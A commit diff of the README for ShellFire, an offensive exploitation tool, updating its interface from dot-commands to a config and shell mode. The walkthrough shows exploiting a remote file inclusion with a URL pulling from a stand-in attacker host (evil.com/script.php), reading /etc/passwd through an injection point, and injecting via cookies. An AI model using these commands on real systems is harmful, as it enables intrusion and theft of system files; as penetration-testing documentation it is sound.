Update README to reflect new interface.

unix-ninja · Mar 3, 2023 · fa8f1cf · fa8f1cf
1 parent 2c0307f
commit fa8f1cf
Showing 1 changed file with 23 additions and 11 deletions.
diff --git a/README.md b/README.md
@@ -41,36 +41,48 @@ After installing, you can just call 'shellfire' from your terminal.
 
 ```
 $ shellfire
-[*] ShellFire v0.8
-[*] Type '.help' to see available commands
->>
+[*] ShellFire v0.11
+[*] Type 'help' to see available commands
+(config)>
 ```
 
-You can type `.help` at any time for a list of available commands, or append 
+You can type `help` at any time inside config mode for a list of available commands, or append 
 the command you want to know more information about to help for specific 
-details. For example `.help .http`.
+details. For example `help http`.
 
 Let's explore how to attack a basic RFI vulnerability!
 
 To start exploitation, you need to specify at least the URL parameter of your target. 
 Something like the following should work:
 
 ```
->> .url http://example.com/?path=http://evil.com/script.php
+(config)> url http://example.com/?path=http://evil.com/script.php
 ```
 
 Running any command now would cause your RFI to get executed on the remote target.
 
 Let's say you want to arbitrarily control the payloads going to the path paramter. This time, we will use `{}` to specify our injection point.
 
 ```
->> .url http://example.com/?path={}
+(config)> url http://example.com/?path={}
+```
+
+Before we can send our payloads, we must enter shell mode.
+
+```
+(config)> shell
 ```
 
 Now, you can just type the payload you want to send and hit enter.
 
 ```
->> /etc/passwd
+(shell)> /etc/passwd
+```
+
+You can always type "exit" to return from shell mode, back to config mode.
+
+```
+(shell)> exit
 ```
 
 At this point, you should have enough to exploit easy vulnerabilities. Payloads you enter on the shell will be appropriately injected and sent over to your target.
@@ -80,17 +92,17 @@ For example, let's assume you needed to send a cookie with a session ID in
 order to exploit your target. You may want to add something like this:
 
 ```
->> .cookies { "session_id" : "123456789" }
+(config)> cookies { "session_id" : "123456789" }
 ```
 
 We can specify injection points in cookies too.
 
 ```
->> .cookies { "session_id" : "123456789", "vuln_param": "{}" }
+(config)> cookies { "session_id" : "123456789", "vuln_param": "{}" }
 ```
 
 Additional options, and information on how to use them, can be discovered by 
-using the `.help` option in the shell.
+using the `help` option in config mode.
 
 Thanks to Offensive-Security for inspiring the creation of this utility.